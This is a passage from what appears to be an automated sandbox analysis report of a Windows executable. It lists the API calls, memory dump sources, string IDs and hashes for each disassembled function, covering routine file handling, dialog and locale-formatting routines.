        • GetDlgItem.USER32(?,0000006C), ref: 0013D4D0
        • SetFocus.USER32(00000000), ref: 0013D4D7
        • SetDlgItemTextW.USER32(?,00000065,?), ref: 0013D511
        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0013D548
        • FindFirstFileW.KERNEL32(?,?), ref: 0013D55E
          • Part of subcall function 0013BC1B: FileTimeToSystemTime.KERNEL32(?,?), ref: 0013BC2F
          • Part of subcall function 0013BC1B: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0013BC40
          • Part of subcall function 0013BC1B: SystemTimeToFileTime.KERNEL32(?,?), ref: 0013BC4E
          • Part of subcall function 0013BC1B: FileTimeToSystemTime.KERNEL32(?,?), ref: 0013BC5C
          • Part of subcall function 0013BC1B: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0013BC77
          • Part of subcall function 0013BC1B: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 0013BC9E
          • Part of subcall function 0013BC1B: _swprintf.LIBCMT ref: 0013BCC4
        • _swprintf.LIBCMT ref: 0013D5A7
          • Part of subcall function 00124A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00124A33
        • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0013D5BA
        • FindClose.KERNEL32(00000000), ref: 0013D5C1
        • _swprintf.LIBCMT ref: 0013D610
        • SetDlgItemTextW.USER32(?,00000068,?), ref: 0013D623
        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0013D640
        • _swprintf.LIBCMT ref: 0013D673
        • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0013D686
        • _swprintf.LIBCMT ref: 0013D6D0
        • SetDlgItemTextW.USER32(?,00000069,?), ref: 0013D6E3
          • Part of subcall function 0013C083: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0013C0A9
          • Part of subcall function 0013C083: GetNumberFormatW.KERNEL32(00000400,00000000,?,0016072C,?,?), ref: 0013C0F8
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberParentSpecificWindow__vswprintf_c_l
        • String ID: %s %s$REPLACEFILEDLG
        • API String ID: 2415798972-439456425
        • Opcode ID: ee7cda35943eb589b46738946c004c64f008ebb09f9eb8a3eb8ea5c7f88c8a4b
        • Instruction ID: 4c91ece0d9ac4e8e9351ce5402f549ab05bb4222c81850120db665ed833cd4c8
        • Opcode Fuzzy Hash: ee7cda35943eb589b46738946c004c64f008ebb09f9eb8a3eb8ea5c7f88c8a4b
        • Instruction Fuzzy Hash: FF71B2B2548304BBE7319BA4FC49FFB77EDEB8A700F040819B649D6490D775AA448772
        APIs
        • __EH_prolog.LIBCMT ref: 00127AB4
        • _wcslen.LIBCMT ref: 00127B1D
        • _wcslen.LIBCMT ref: 00127B8E
          • Part of subcall function 00128704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00128713
          • Part of subcall function 00128704: GetLastError.KERNEL32 ref: 00128759
          • Part of subcall function 00128704: CloseHandle.KERNEL32(?), ref: 00128768
          • Part of subcall function 0012B470: DeleteFileW.KERNEL32(?,00000000,?,0012A438,?,?,?,?,0012892B,?,?,?,001537FF,000000FF), ref: 0012B481
          • Part of subcall function 0012B470: DeleteFileW.KERNEL32(?,?,?,00000800,?,0012A438,?,?,?,?,0012892B,?,?,?,001537FF,000000FF), ref: 0012B4AF
        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00127C43
        • CloseHandle.KERNEL32(00000000), ref: 00127C5F
        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00127DAB
          • Part of subcall function 0012B032: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00127ED0,?,?,?,00000000), ref: 0012B04C
          • Part of subcall function 0012B032: SetFileTime.KERNEL32(?,?,?,?), ref: 0012B100
          • Part of subcall function 0012A880: CloseHandle.KERNEL32(000000FF,?,?,0012A83D,?,?,?,?,?,001537FF,000000FF), ref: 0012A89B
          • Part of subcall function 0012B8E6: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,0012B5B5,?,?,?,0012B405,?,00000001,00000000,?,?), ref: 0012B8FA
          • Part of subcall function 0012B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0012B5B5,?,?,?,0012B405,?,00000001,00000000,?,?), ref: 0012B92B
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
        • API String ID: 3983180755-3508440684
        • Opcode ID: ea6c308046e623b469d37c8c262bee01408f475d80d7b02319f63fdf89c1e6ce
        • Instruction ID: 8df7c48ef7e09f191515ff915093c3e967377696581624b81d43fd61c6221798
        • Opcode Fuzzy Hash: ea6c308046e623b469d37c8c262bee01408f475d80d7b02319f63fdf89c1e6ce
        • Instruction Fuzzy Hash: 93C1C271904269AFDB21DB64EC85FEFB3A8AF14314F00455AF545E7282D730AAA4CBA1
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: __floor_pentium4
        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
        • API String ID: 4168288129-2761157908
        • Opcode ID: edc6b03b0b5daaad8a7d7d5386b6bf1e20df594a119017a64caaa9a6a2cc4a41
        • Instruction ID: 1a8e6f52e042a7f554d03b0601819b1c36020e5e9fadabf1180125f24099ed2e
        • Opcode Fuzzy Hash: edc6b03b0b5daaad8a7d7d5386b6bf1e20df594a119017a64caaa9a6a2cc4a41
        • Instruction Fuzzy Hash: 32C22871E046288FDB29CF28DD407EAB7B5EB84305F1541EAD84DE7250E778AE868F41
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: H_prolog_swprintf
        • String ID: CMT$h%u$hc%u
        • API String ID: 146138363-3282847064
        • Opcode ID: 57e9c35b5a477ae29a3cc496a037bb5f3879e0045366e424542354a2ab195840
        • Instruction ID: 5c5edc5d9ed39b29fba8c5000f89485e9962a2d75aae4dbd577c7397354a424b
        • Opcode Fuzzy Hash: 57e9c35b5a477ae29a3cc496a037bb5f3879e0045366e424542354a2ab195840
        • Instruction Fuzzy Hash: F042E871600264DFDF24DF74E891AE93BE5AF25300F04447DFC5A8B282DB74AA99CB61
        APIs
        • __EH_prolog.LIBCMT ref: 00122EBF
        • _strlen.LIBCMT ref: 0012348B
          • Part of subcall function 001315F9: __EH_prolog.LIBCMT ref: 001315FE
          • Part of subcall function 00132EC2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0012CF18,00000000,?,?), ref: 00132EDE
        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001235DD
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
        • String ID: CMT
        • API String ID: 1206968400-2756464174
        • Opcode ID: faa12da0aaea3564ed65f40650e8c3c275113084907b3059acb2f04bec687646
        • Instruction ID: ef1903654f6a1517be5da11bb2192122291c2aa9cad9495e94715bd152485cd4
        • Opcode Fuzzy Hash: faa12da0aaea3564ed65f40650e8c3c275113084907b3059acb2f04bec687646
        • Instruction Fuzzy Hash: 206239716002A48FDF19DF38E8956E93BE1BF25304F08457DFC6A8B282DB749A55CB60
        APIs
        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00140A06
        • IsDebuggerPresent.KERNEL32 ref: 00140AD2
        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00140AF2
        • UnhandledExceptionFilter.KERNEL32(?), ref: 00140AFC
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
        • String ID:
        • API String ID: 254469556-0
        • Opcode ID: 1c9c4ea2fffed447644622d343a59577fdeef8add350092c26083186c815be99
        • Instruction ID: 4d9ed5187b4b9cbdf6f78b28a5ee682b3f2744745702e723df1b30490bd9a47b
        • Opcode Fuzzy Hash: 1c9c4ea2fffed447644622d343a59577fdeef8add350092c26083186c815be99
        • Instruction Fuzzy Hash: F8313675D0131CDBDB21EFA5D989BCDBBB8AF18304F1041AAE508AB250EB719AC48F04
        APIs
        • VirtualQuery.KERNEL32(80000000,0013F764,0000001C,0013F959,00000000,?,?,?,?,?,?,?,0013F764,00000004,00183D24,0013F9E9), ref: 0013F830
        • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0013F764,00000004,00183D24,0013F9E9), ref: 0013F84B
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: InfoQuerySystemVirtual
        • String ID: D
        • API String ID: 401686933-2746444292
        • Opcode ID: 39bd5e04d30087735fa660d08452caae06cb50b71b24f4b6aa68faa21773abd2
        • Instruction ID: 21518048a47c5c20cef026e40152c796c88e8d2a62e26f2644b17de1b1350750
        • Opcode Fuzzy Hash: 39bd5e04d30087735fa660d08452caae06cb50b71b24f4b6aa68faa21773abd2
        • Instruction Fuzzy Hash: F401D832A00109ABCB18DE29DC05BDD7BA9AFD4324F08C134ED19DB154D734D9428680
        APIs
        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 001450D7
        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 001450E1
        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 001450EE
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled$DebuggerPresent
        • String ID:
        • API String ID: 3906539128-0
        • Opcode ID: 2041df7687dfedc1d6ec1129e53d789f8fb7a63a5becc200ecc1996d15f89ed9
        • Instruction ID: c72e688648639de149ad7522711c0f2e12269d594ba0167b62561b1035aefc24
        • Opcode Fuzzy Hash: 2041df7687dfedc1d6ec1129e53d789f8fb7a63a5becc200ecc1996d15f89ed9
        • Instruction Fuzzy Hash: D731C675901218ABCB21DF64DC89B9DBBB4BF18710F5041DAE90CA7261EB709FC58F44
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID:
        • String ID: .
        • API String ID: 0-248832578
        • Opcode ID: 173bfc07dde675f7370d2f1832797ea97311e0a4211f5fafe08b95e254eca718
        • Instruction ID: 7fde380435eccf38c9e714e4f95787ff81b27cd85b28e19726115b232c710d81
        • Opcode Fuzzy Hash: 173bfc07dde675f7370d2f1832797ea97311e0a4211f5fafe08b95e254eca718
        • Instruction Fuzzy Hash: E3310571900249AFCB649E78CC84EFF7BBDDB85314F0441A8F819DB261E770AE458BA0
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d08e2bcb8369247a90beecc4ac2937ecc20121a35f50d3dd5c946701bfc99d8e
        • Instruction ID: 164898d0f67e2a2856d9d814cde5030b2099d97c4656e774e48114aac2e8eb46
        • Opcode Fuzzy Hash: d08e2bcb8369247a90beecc4ac2937ecc20121a35f50d3dd5c946701bfc99d8e
        • Instruction Fuzzy Hash: B7020B71E002199FDF14CFA9C8906ADBBF1FF58324F258269D919E7294D731AA418B90
        APIs
        • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0013C0A9
        • GetNumberFormatW.KERNEL32(00000400,00000000,?,0016072C,?,?), ref: 0013C0F8
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: FormatInfoLocaleNumber
        • String ID:
        • API String ID: 2169056816-0
        • Opcode ID: f923d341d6650e601a13a7f7ad9b469012aa27872352040570323a718a12ca1a
        • Instruction ID: 4958e305904ceca91eac812c2d4f756eeab8002f2a135e176651a4cbb761583a
        • Opcode Fuzzy Hash: f923d341d6650e601a13a7f7ad9b469012aa27872352040570323a718a12ca1a
        • Instruction Fuzzy Hash: 6A017C3A140308BBD710DFA5EC45F9B77BCEF18715F009422FA04AB190E3B0A995CBA5
        APIs
        • GetLastError.KERNEL32(00127886,?,00000400), ref: 00127727
        • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00127748
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ErrorFormatLastMessage
        • String ID:
        • API String ID: 3479602957-0
        • Opcode ID: bb4ee3f62e1e196a7c06ceb78c476290679880278b832c2208216f7e5d5db439
        • Instruction ID: 333fa93fd0e6fa9fcf70df1bc3f332cdde1c609bb26fa5e618e71b21404d6d57
        • Opcode Fuzzy Hash: bb4ee3f62e1e196a7c06ceb78c476290679880278b832c2208216f7e5d5db439
        • Instruction Fuzzy Hash: E6D0A931348300FBFA100B307C0AF6B3799BB00B42F20C004BB08E80E0E77090A0A728
        APIs
        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00152B9F,?,?,00000008,?,?,0015283F,00000000), ref: 00152DD1
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ExceptionRaise
        • String ID:
        • API String ID: 3997070919-0
        • Opcode ID: f0184acf04b741058c3d43ca89e4d8a7694f820454cf357f77ace5b7b8f83417
        • Instruction ID: 1159a87f61c250f1ede5a7c6c2dc8528f7ed37870a1adb4a4548241a22939c70
        • Opcode Fuzzy Hash: f0184acf04b741058c3d43ca89e4d8a7694f820454cf357f77ace5b7b8f83417
        • Instruction Fuzzy Hash: 06B13E32510609DFD719CF28C486B657BE0FF46366F298658ECA9CF2A1C335E995CB40
        APIs
        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0014082C
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: FeaturePresentProcessor
        • String ID:
        • API String ID: 2325560087-0
        • Opcode ID: c2000f70c988421f8eabada271ecd3407a794a1ec51896966d3e5c10fe321aca
        • Instruction ID: f1ced254402be99730460c7d771bbd378544f8013c364edb629226729066ebe7
        • Opcode Fuzzy Hash: c2000f70c988421f8eabada271ecd3407a794a1ec51896966d3e5c10fe321aca
        • Instruction Fuzzy Hash: 58516DB1E002058FEB16CF95D9857AEB7F0FB48314F24852AD559EB2A1D3749E80CF90
        APIs
        • GetVersionExW.KERNEL32(?), ref: 0012C388
          • Part of subcall function 0012C3F7: __EH_prolog.LIBCMT ref: 0012C3FC
          • Part of subcall function 0012C3F7: CoCreateInstance.COMBASE(001568A0,00000000,00000001,001567D0,?), ref: 0012C41E
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: CreateH_prologInstanceVersion
        • String ID:
        • API String ID: 511865808-0
        • Opcode ID: 097deafd345bc05cf9b0b2a95f9bfa7a52f22de980de08e20d2a77858ad70ed5
        • Instruction ID: 3e96cb55d75f63bbaac2bbf777a91461e2a801f632e6556f6baee4d913d190db
        • Opcode Fuzzy Hash: 097deafd345bc05cf9b0b2a95f9bfa7a52f22de980de08e20d2a77858ad70ed5
        • Instruction Fuzzy Hash: ADF058309042A88BDF25DB24BC0A2DC3BE46B11709F0488C5D29052692D3B58AE9DFB2
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID:
        • String ID: gj
        • API String ID: 0-4203073231
        • Opcode ID: a6c0517ade074d899f2e370b70dc703ebbd6106b1fe5c81ef61a0cd1b31ab7f9
        • Instruction ID: c4cedd0e5acf23045b854f12b1295e19c7411ae3f1072bcc44a3da40ea97b6e0
